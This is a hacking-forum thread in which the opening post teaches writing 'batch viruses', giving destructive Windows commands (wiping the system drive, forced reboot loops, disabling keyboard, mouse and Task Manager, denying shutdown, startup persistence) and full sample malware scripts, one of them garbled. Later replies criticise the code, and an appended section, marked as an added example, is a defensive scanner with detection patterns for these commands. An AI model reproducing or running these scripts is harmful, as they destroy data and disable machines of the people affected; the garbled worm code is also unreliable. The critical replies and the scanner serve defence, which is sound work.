Author Topic: Batch Virus Tutorial  (Read 5107 times)


Xedafen

  • Guest
Batch Virus Tutorial
« on: October 21, 2014, 05:18:58 am »
-+Introduction To Batch Viruses By Xed+-
If you are going to make a virus of ANY type, using any language, I suggest learning how to create batch viruses first. Why? It's simple, and it will give you a clear understanding of how viruses work in simple terms, so when you go on to create better viruses, you have an idea of what you're doing. Also, this is STRICTLY FOR EDUCATIONAL PURPOSES ONLY. Lastly, I would like to say batch viruses are very easy to spot, and are not that hard to make. Why? Because tons of info on them from the 90's is being released due to the fact they are outdated. And viruses nowadays want to steal information and money, not destroy your computer. And do not think that after reading my tutorial you will be some L33t Hakx0r, this is just bare bones ideas of a virus. What we will be going over: Worms, computer destruction, deleted files, annoying things, and how to mess someone up BAD.


-+Basic Commands+-
When creating a batch virus, some key commands that I believe are necessary to making a virus are:

+To delete PC's System Drive:

Code: [Select]
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

+To disable keyboard:

Code: [Select]
rundll32 keyboard,disable
rundll32 mouse,disable

+To add itself to startup:

Code: [Select]
copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg

+To Disable task manager:

Code: [Select]
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
start /w regedit /s %WINDIR%\DXM.reg



+To disable shutdown

Code: [Select]
icacls %windir%\system32\shutdown.exe /deny SID:D


+Extras
Copy %0 (Directory): Copies the running file to whatever specified place, however NOT executables. This is useful for making a worm, copy it to popular folders and such to make sure your virus spreads and doesn't leave.


Start (Whatever.whatever): This can start another program or file up, useful for spamming pop ups and other viruses.


kill (Specified program): Ends the process of a program, useful for disabling antivirus and such.



-+Example Worms+-
Now that I gave you the basics of what popular virus commands do and what they are, here are some code examples that I have broken down for you to understand.




PROTEUS WORM BREAK DOWN
Code: [Select]
@echo offclsIf exist c:scar.txt goto MsgBoxIf not exist c:scar.txt goto scar_computer:Scar_computerecho This computer has already been infected by Proteus > > c:scar.txtecho Cancel start up of worm and move on to next command > > c:scar.txtecho If this file is deleted then the worm will not skip your computer and > > c:scar.txtecho you will be infected again > > c:scar.txtecho  > > c:scar.txtecho 2003 > > c:scar.txtecho 0SYSTEMHACKER0 ©> > c:scar.txtgoto WormKazaa:MsgBoxecho MsgBox "Unable to open program due to out of system resources", vbCritical, "Unable to open file" > > c:MsgBox.vbsStart c:MsgBox.vbsgoto end:WormKazaaCopy %0 C:ProgramFilesKaZaAMySharedFolderMatrix2.vid.batCopy %0 C:Program FilesKaZaAMy Shared Folder8-legged-freaks.vid.batCopy %0 C:Program FilesKaZaAMy Shared FolderPassword_finder.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folders-club7.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderJackAss the movie.vid.batCopy %0 C:Program FilesKaZaAMy Shared Folderpassword hacker.exe.batCopy %0 C:Program FilesKaZaAMy Shared FolderNorton anti virus.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folder8-mile.mpg.batCopy %0 C:Program FilesKaZaAMy Shared Folderkazaa.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folderrealplayer.exe.batCopy %0 C:Program FilesKaZaAMy Shared FolderMyPic.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderBill gates *very funny*.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderBill gates *very funny*.mpg.batCopy %0 C:Program FilesKaZaAMy Shared Folderwindows xp.exe.batCopy %0 C:Program FilesKaZaAMy Shared FolderHow to make viruses.txt.batCopy %0 C:Program FilesKaZaAMy Shared Folder*very funny*.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderHow to stop worm viruses.txt.batgoto MainBody:MainBodycd c:md Aboutecho Proteus > > C:AboutProteus.txtecho  > > C:AboutProteus.txtecho Proteus P2P KaZaA worm > > C:AboutProteus.txtecho was made by 0SYSTEMHACKER0> > C:AboutProteus.txtecho Proteus will not infect the same computer twice > > 
C:AboutProteus.txtecho you have already been infected > > C:AboutProteus.txtecho  > > C:AboutProteus.txtecho You cannot stop what cannot be stopped! > > C:AboutProteus.txtecho Proteus > > C:AboutProteus.txtecho 2003 © > > C:AboutProteus.txtgoto MsgBox:endEnd

TWO PART DESTRUCTION BREAKDOWN (You might have heard of this simple virus before, it was known as tpd.zip)


Code: [Select]
t.bat
@echo off
::First thing it does is copy itself to startup, this is where i got the code.
:t
copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg


goto p


:p
::starts part 2 of the virus
start tp.bat
::Deletes c drive (Also where I got the code)

del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


tp.bat
@echo off
Title Hacked
color 0a
:tpd
cls
echo.
echo.
echo.
echo You've been hacked.
::Fake text
start tp.bat
goto tpd
::Spams this same program over and over to make it so exiting out of the real virus, t.bat is hard


A simple virus I made

Code: [Select]
@echo off
::Copying to startup

copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg


shutdown -r -f -t 00
::Shuts down the computer whenever its started up. Evil, I know, but this is evilzone is it not?

-+Closing+-
Hope this little tutorial helped. PM me for more info and make sure to add any suggestions in the comments. I think I will do a browser virus tutorial next, since I have never, ever seen one done before on the internet. And btw, not sure why this screwed up when I posted it. Maybe a mod could help. It made the text (as you see) faded, and most of the Proteus worm is messed up and out of whack, not sure why. Here's the link to the Proteus worm for the complete code, but without my breakdown, in case you cannot read the code above.
http://www.rohitab.com/discuss/topic/541-batch-worm-made-by-0systemhacker0/page-2
« Last Edit: October 22, 2014, 09:17:53 pm by Xedafen »

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
Re: Batch Virus Tutorial
« Reply #1 on: October 21, 2014, 07:39:23 am »
Holy bbcode abuse batman!

@OP I'm giving you a few hours to fix this post, or it goes to trash, kk.

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
Re: Batch Virus Tutorial
« Reply #2 on: October 21, 2014, 09:39:49 am »
I don't think you know what you are doing there.

Quote
+To add itself to startup:

copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg

copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
This won't work if:
  • The user does not have an English operating system
  • Windows is not installed on drive C

Usually I'd say: Have you ever heard of environmental variables? But you actually do, because you use them later. But why not here? Did you just copy & paste different snippets into one script? That would explain a lot, e.g., the inconsistency in capitalization, and the explanations that do not fit to the code.

copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"

This does not do anything to be run at startup.

ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg

Neither does this. You just write the beginning of a .reg file. This actually belongs to the next section.

Quote
+To Disable task manager:

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg


echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg


start /w regedit /s %WINDIR%\DXM.reg

Do you realize that you wrote the same registry entry two times?

And why so complicated? Why write and start a .reg file instead of calling reg.exe directly?
You will achieve the same with just one line.

Code: [Select]
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1

Quote
kill (Specified program): Ends the process of a program, useful for disabling antivirus and such.

You can't just kill antivirus processes. They protect themselves, e.g., by SSDT hooking.

Quote
.Copy %0 C:ProgramFilesKaZaAMySharedFolderMatrix2.vid.batCopy %0 C:Program FilesKaZaAMy Shared Folder8-legged-freaks.vid.batCopy %0 C:Program FilesKaZaAMy Shared FolderPassword_finder.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folders-club7.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderJackAss the movie.vid.batCopy %0 C:Program FilesKaZaAMy Shared Folderpassword hacker.exe.batCopy %0 C:Program FilesKaZaAMy Shared FolderNorton anti virus.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folder8-mile.mpg.batCopy %0 C:Program FilesKaZaAMy Shared Folderkazaa.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folderrealplayer.exe.batCopy %0 C:Program
...

Do you realize that this is just fucked up code? Path separators are missing, newlines are missing, this code will not run. Where did you copy it from?

But most importantly: You did not create a virus.
Look up the definition. You made a malicious file, no doubt, but this is nothing else than a little piece of crap. Copying your file in some frequently used folders does not spread (to other systems) nor execute your malware. So what is even the purpose of this?
Your "virus" does not infect any files, it can not spread, and the replication is a joke. Even if it could spread, it would not have a chance to, because the payload is meant to be destructive instantly.

This is not HF.
« Last Edit: October 21, 2014, 09:50:06 am by Deque »
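
Added example, not part of any post in this thread: a static triage pass a defender could run over a batch script to flag the behaviours discussed above (recursive forced delete, forced shutdown, Startup-folder copy, self-copy via %0, the DisableTaskMgr policy value, silent regedit import, icacls deny on a system binary). The rule names, severities, the `triage` function and the `HKCU\Software\Example` line are assumptions of this example; the other sample lines are the commands quoted in the thread.

```python
import re

# Rule names and severities are this example's own choices; each pattern
# covers one behaviour named in the thread, matched per batch line.
RULES = [
    ("recursive-forced-delete", "high",
     re.compile(r'^@?(del|erase|rd|rmdir)\b(?=.*\s/s\b)(?=.*\s/q\b)', re.I)),
    ("forced-shutdown", "medium",
     re.compile(r'^@?shutdown(\.exe)?\b(?=.*\s[-/]f\b)', re.I)),
    ("startup-folder-write", "high",
     re.compile(r'^@?(copy|xcopy|move)\b.*\\Start Menu\\Programs\\Startup', re.I)),
    ("self-copy", "medium",
     re.compile(r'^@?(copy|xcopy)\s+"?%~?[a-z]*0\b', re.I)),
    # Only the "disable" direction (value 1), via a .reg line or reg.exe.
    ("taskmgr-policy", "high",
     re.compile(r'DisableTaskMgr\b.*(dword:0*1\b|/d\s+1\b)', re.I)),
    ("silent-reg-import", "medium",
     re.compile(r'\bregedit(\.exe)?\b.*\s/s\b', re.I)),
    ("acl-deny-on-system-binary", "high",
     re.compile(r'^@?icacls\b.*(%windir%|%systemroot%).*\s/deny\b', re.I)),
]


def triage(script_text):
    """Return (line_no, rule, severity, line) for every rule hit."""
    findings = []
    for no, raw in enumerate(script_text.splitlines(), 1):
        line = raw.strip()
        # Skip blank lines and batch comments (":: ..." and "rem ...").
        if not line or line.startswith("::") or re.match(r'@?rem\b', line, re.I):
            continue
        for name, severity, pattern in RULES:
            if pattern.search(line):
                findings.append((no, name, severity, line))
    return findings


# Constructed sample: commands quoted in the thread plus one benign line
# (value 0) that must not trigger the taskmgr-policy rule.
SAMPLE = r'''@echo off
::Copying to startup
copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
start /w regedit /s %WINDIR%\DXM.reg
icacls %windir%\system32\shutdown.exe /deny SID:D
reg add "HKCU\Software\Example" /v DisableTaskMgr /t REG_DWORD /d 0
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
'''

if __name__ == "__main__":
    for no, rule, severity, line in triage(SAMPLE):
        print(f"line {no}: [{severity}] {rule}: {line}")
```

The pass is line-based, so commands chained with `&` on one line or built up through variables are only matched by the unanchored rules; treat a clean result as "nothing obvious", not as a verdict.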

Offline RedBullAddicted

  • VIP
  • Sir
  • *
  • Posts: 519
  • Cookies: 189
Re: Batch Virus Tutorial
« Reply #3 on: October 21, 2014, 09:59:10 am »
Deque.. you are just awesome.  :) Not more to say

Offline Killordie

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 2
Re: Batch Virus Tutorial
« Reply #4 on: October 21, 2014, 10:23:39 am »
To the OP: You should really learn to program first or get general computer knowledge before trying anything funky.
Deque really picked him apart lol.
« Last Edit: October 21, 2014, 10:29:42 am by Killordie »

Offline Kulverstukas

Re: Batch Virus Tutorial
« Reply #5 on: October 21, 2014, 11:35:51 am »
Damn, because of Deque this thread received some value... can't remove it anymore :P +1 deque.

Offline Nortcele

  • Knight
  • **
  • Posts: 211
  • Cookies: -42
  • █+█=██
Re: Batch Virus Tutorial
« Reply #6 on: October 21, 2014, 04:59:36 pm »
@Deque just raped this thread.

Offline Killeramor

  • Peasant
  • *
  • Posts: 115
  • Cookies: 5
  • Programming tutor for Qbasic, and beginner C++.
Re: Batch Virus Tutorial
« Reply #7 on: October 21, 2014, 05:40:49 pm »
@Deque, Wow man. This thread is informative now. I now know what not to do with that code. haha

Xedafen

  • Guest
Re: Batch Virus Tutorial
« Reply #8 on: October 22, 2014, 03:29:39 am »
Quote
But most importantly: You did not create a virus.
Look up the definition. You made a malicious file, no doubt, but this is nothing else than a little piece of crap. Copying your file in some frequently used folders does not spread (to other systems) nor execute your malware. So what is even the purpose of this?
Your "virus" does not infect any files, it can not spread, and the replication is a joke. Even if it could spread, it would not have a chance to, because the payload is meant to be destructive instantly.

This is not HF.

You probably know more than me, and I listen. If anything what you said helped me, so thank you. However I would like to clarify things. 1. I know the code is messed up, as you can see in my closing I tried to ask a mod to fix it because no matter how many times I modified it it would not copy right, that's why I added a link to the full code. Secondly, I DID just copy and paste the code, like you pointed out even though I already said it (i.e. "This is where I got it from"). Thirdly, the copying to startup does work, I have tested it. And, most copies of Windows ARE on the C drive, and this is an English board, therefore I assumed there would only be English operating systems. Like I also said, this was not meant to be actually used, no one is going to download a .bat file thinking it's something else, this was just meant for learning purposes. And lastly, this IS a virus. "A piece of code that is capable of copying itself and typically has a detrimental effect, such as corrupting the system or destroying data." And that's exactly what this does. All this was, was a simple tutorial of the basics of what a virus does, that's all it was meant to be, nothing more. And again, thank you, because I learned more about this topic.
« Last Edit: October 22, 2014, 03:31:21 am by Xedafen »

Offline Kulverstukas

Re: Batch Virus Tutorial
« Reply #9 on: October 22, 2014, 07:55:32 am »
Quote
You probably know more than me, and I listen. If anything what you said helped me, so thank you. However I would like to clarify things. 1. I know the code is messed up, as you can see in my closing I tried to ask a mod to fix it because no matter how many times I modified it it would not copy right, that's why I added a link to the full code. Secondly, I DID just copy and paste the code, like you pointed out even though I already said it (i.e. "This is where I got it from"). Thirdly, the copying to startup does work, I have tested it. And, most copies of Windows ARE on the C drive, and this is an English board, therefore I assumed there would only be English operating systems. Like I also said, this was not meant to be actually used, no one is going to download a .bat file thinking it's something else, this was just meant for learning purposes. And lastly, this IS a virus. "A piece of code that is capable of copying itself and typically has a detrimental effect, such as corrupting the system or destroying data." And that's exactly what this does. All this was, was a simple tutorial of the basics of what a virus does, that's all it was meant to be, nothing more. And again, thank you, because I learned more about this topic.

We want results, not excuses. Format your damn post now, since I can't remove this thread because Deque just retitled this as "How NOT to code in batch". Also this is hardly a tutorial...

Xedafen

  • Guest
Re: Batch Virus Tutorial
« Reply #10 on: October 22, 2014, 09:20:02 pm »
Quote
We want results, not excuses. Format your damn post now, since I can't remove this thread because Deque just retitled this as "How NOT to code in batch". Also this is hardly a tutorial...


Okay I fixed it. I am legitimately sorry. All I wanted was to share what I thought was a tutorial.

Offline Kulverstukas

Re: Batch Virus Tutorial
« Reply #11 on: October 22, 2014, 10:07:23 pm »
Quote
Okay I fixed it. I am legitimately sorry. All I wanted was to share what I thought was a tutorial.

No worries. Keep at it, accept criticism and you'll become l33t like us one day!

Xedafen

  • Guest
Re: Batch Virus Tutorial
« Reply #12 on: October 23, 2014, 01:09:15 am »
Quote
No worries. Keep at it, accept criticism and you'll become l33t like us one day!


XD okay
